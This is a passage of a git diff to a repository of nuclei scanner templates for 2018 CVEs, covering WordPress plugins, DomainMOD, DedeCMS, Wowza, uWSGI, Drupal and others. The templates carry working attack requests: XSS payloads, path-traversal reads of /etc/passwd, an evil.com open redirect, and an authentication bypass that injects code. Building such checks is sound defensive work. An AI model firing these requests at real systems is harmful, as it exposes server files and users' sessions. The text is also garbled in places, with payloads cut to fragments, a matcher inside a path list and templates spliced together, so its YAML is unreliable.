'{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "self.location = 'http://evil.com'" + - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" +# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-18069.yaml b/nuclei-templates/CVE-2018/cve-2018-18069.yaml new file mode 100644 index 0000000000..2f61102505 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18069.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-18069 + +info: + name: Wordpress unauthenticated stored xss + author: nadino + severity: medium + description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + tags: cve,cve2018,wordpress,xss,plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin.php" + body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' + redirects: true + + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' diff --git a/nuclei-templates/CVE-2018/cve-2018-18608.yaml b/nuclei-templates/CVE-2018/cve-2018-18608.yaml new file mode 100644 index 0000000000..c9d46aecf6 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18608.yaml @@ -0,0 +1,56 @@ +id: CVE-2018-18608 + +info: + name: DedeCMS 5.7 SP2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. + reference: + - https://github.com/ky-j/dedecms/issues/8 + - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18608 + cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54991 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dedecms + product: dedecms + shodan-query: http.html:"DedeCms" + tags: cve2018,cve,dedecms,xss + +http: + - method: GET + path: + - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" + - "DedeCMS Error Warning!" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/cve-2018-18777.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18777.yaml rename to nuclei-templates/CVE-2018/cve-2018-18777.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/cve-2018-18778.yaml deleted file mode 100644 index 556e6cf52e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-18778.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-18778 - -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - tags: cve,cve2018,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18925.yaml b/nuclei-templates/CVE-2018/cve-2018-18925.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18925.yaml rename to nuclei-templates/CVE-2018/cve-2018-18925.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19136.yaml b/nuclei-templates/CVE-2018/cve-2018-19136.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19136.yaml rename to nuclei-templates/CVE-2018/cve-2018-19136.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-19365.yaml b/nuclei-templates/CVE-2018/cve-2018-19365.yaml index 7b30433c16..2b040cfd71 100644 --- a/nuclei-templates/CVE-2018/cve-2018-19365.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-19365.yaml @@ -1,20 +1,34 @@ id: CVE-2018-19365 + info: - name: Wowza Streaming Engine Manager Directory Traversal + name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal author: 0x_Akoko - severity: high - description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request + severity: critical + description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://www.cvedetails.com/cve/CVE-2018-19365 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 + - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 cve-id: CVE-2018-19365 cwe-id: CWE-22 - tags: cve,cve2018,wowza,lfi + epss-score: 0.01354 + epss-percentile: 0.8589 + cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wowza + product: streaming_engine + tags: cve2018,cve,wowza,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" @@ -29,3 +43,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19386.yaml b/nuclei-templates/CVE-2018/cve-2018-19386.yaml deleted file mode 100644 index 1d426ddfe2..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19386.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-19386 - -info: - name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting - author: pikpikcu - severity: medium - reference: https://www.cvedetails.com/cve/CVE-2018-19386/ - tags: cve,cve2018,solarwinds,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-19386 - cwe-id: CWE-79 - description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." - -requests: - - method: GET - path: - - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '')" + condition: and +# digest: 4b0a00483046022100c2a0e755f2e7f7a0744d4444c1e2d3880abdcaf721e4f7a8dc1e593faaf4521e0221008758fdacd7ef1cdf080680a53f6ab8d435d736dbc60a7c8f9440afa49d90d100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19751.yaml b/nuclei-templates/CVE-2018/cve-2018-19751.yaml new file mode 100644 index 0000000000..7cc00d6e2e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19751.yaml @@ -0,0 +1,69 @@ +id: CVE-2018-19751 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45947/ + - https://github.com/domainmod/domainmod/issues/83 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19751 + cwe-id: CWE-79 + epss-score: 0.00096 + epss-percentile: 0.39112 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/ssl-fields/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test + - | + GET /admin/ssl-fields/ HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100a7525decbb4900d6df4ebff0a8ecf9f11dbb17f10b61a59c45f8837ab3e3375d022100f61ce3800147fd13bc690df9bfc1eecdcc22c78bc4292c2f298468b2f1d0f993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19877.yaml b/nuclei-templates/CVE-2018/cve-2018-19877.yaml deleted file mode 100644 index 2feb8e4312..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19877.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-19877 - -info: - name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. - reference: - - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - - https://www.exploit-db.com/exploits/45958/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19877 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: adiscon,xss,edb,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19892.yaml b/nuclei-templates/CVE-2018/cve-2018-19892.yaml new file mode 100644 index 0000000000..e957023784 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19892.yaml @@ -0,0 +1,69 @@ +id: CVE-2018-19892 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45959 + - https://github.com/domainmod/domainmod/issues/85 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19892 + cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.40415 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve2018,cve,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/dw/add-server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= + - | + GET /admin/dw/servers.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502201f24e9ecdde360ff34ab0c10a92f93fbbf91649ea9a2f0154e5cfb153518dd98022100fdae8217f56ff39de6d7e9c9e41db0001fb9c8ad1b336532ad1105c5fd39fa5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml deleted file mode 100644 index f4203954c8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19914.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19915.yaml b/nuclei-templates/CVE-2018/cve-2018-19915.yaml new file mode 100644 index 0000000000..cb24374b98 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19915.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-19915 + +info: + name: DomainMOD <=4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/87 + - https://www.exploit-db.com/exploits/46376/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19915 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/host.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test + - | + GET /assets/hosting.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 490a0046304402201c56275b5b7376244d1fee0f3bfde7381ade0cb088f1643b3c5e1e668e81b4490220205f8398d1ae9260a0ecd27f592441a68d4709a669d802e783370b414c610020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20009.yaml b/nuclei-templates/CVE-2018/cve-2018-20009.yaml new file mode 100644 index 0000000000..9825590c16 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20009.yaml @@ -0,0 +1,59 @@ +id: CVE-2018-20009 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/88 + - https://www.exploit-db.com/exploits/46372/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20009 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.51511 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= + - | + GET /assets/ssl-providers.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 4a0a004730450220228d241f2ef228aa07915c9b1770c0a34473f66ec0ee918ba511d13df0a08d64022100e196267d6f49e1a417092b2d74d1123fbd4c5d366bb4ed2f01e227431da6b846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml new file mode 100644 index 0000000000..90d48ccdab --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20010.yaml @@ -0,0 +1,60 @@ +id: CVE-2018-20010 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/46373/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20010 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider-account.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= + - | + GET /assets/ssl-accounts.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 4b0a00483046022100c634c1d3655ae86d99caaad29c7f5a5d4ef4d696601e6b952bb796b1326800c7022100f409497a17e56982fb3e63e4424b98b22222eeb4b224a7647417f3220245c8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20011.yaml b/nuclei-templates/CVE-2018/cve-2018-20011.yaml deleted file mode 100644 index 874a57490e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-20011.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-20011 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. - reference: - - https://www.exploit-db.com/exploits/46374/ - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20011 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve1028 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/category.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - - - | - GET /assets/categories.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20985.yaml b/nuclei-templates/CVE-2018/cve-2018-20985.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-20985.yaml rename to nuclei-templates/CVE-2018/cve-2018-20985.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3810.yaml b/nuclei-templates/CVE-2018/cve-2018-3810.yaml new file mode 100644 index 0000000000..242f61e9c0 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-3810.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-3810 + +info: + name: WordPress Smart Google Code Inserter Authentication Bypass + author: princechaddha + severity: critical + reference: https://www.exploit-db.com/exploits/43420 + tags: wordpress,cve,cve2018,google + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" + + body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' + headers: + Content-Type: application/x-www-form-urlencoded + + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-5233.yaml b/nuclei-templates/CVE-2018/cve-2018-5233.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-5233.yaml rename to nuclei-templates/CVE-2018/cve-2018-5233.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7490.yaml b/nuclei-templates/CVE-2018/cve-2018-7490.yaml new file mode 100644 index 0000000000..d77d8d8251 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7490.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-7490 + +info: + name: uWSGI PHP Plugin Directory Traversal + author: madrobot + severity: high + tags: cve,cve2018,uwsgi,php,lfi,plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-7600.yaml b/nuclei-templates/CVE-2018/cve-2018-7600.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7600.yaml rename to nuclei-templates/CVE-2018/cve-2018-7600.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7602.yaml b/nuclei-templates/CVE-2018/cve-2018-7602.yaml index 243e590b31..aa1cc6dda2 100644 --- a/nuclei-templates/CVE-2018/cve-2018-7602.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-7602.yaml @@ -1,19 +1,35 @@ id: CVE-2018-7602 + info: - name: Drupal Remote Code Execution Vulnerability + name: Drupal - Remote Code Execution author: princechaddha 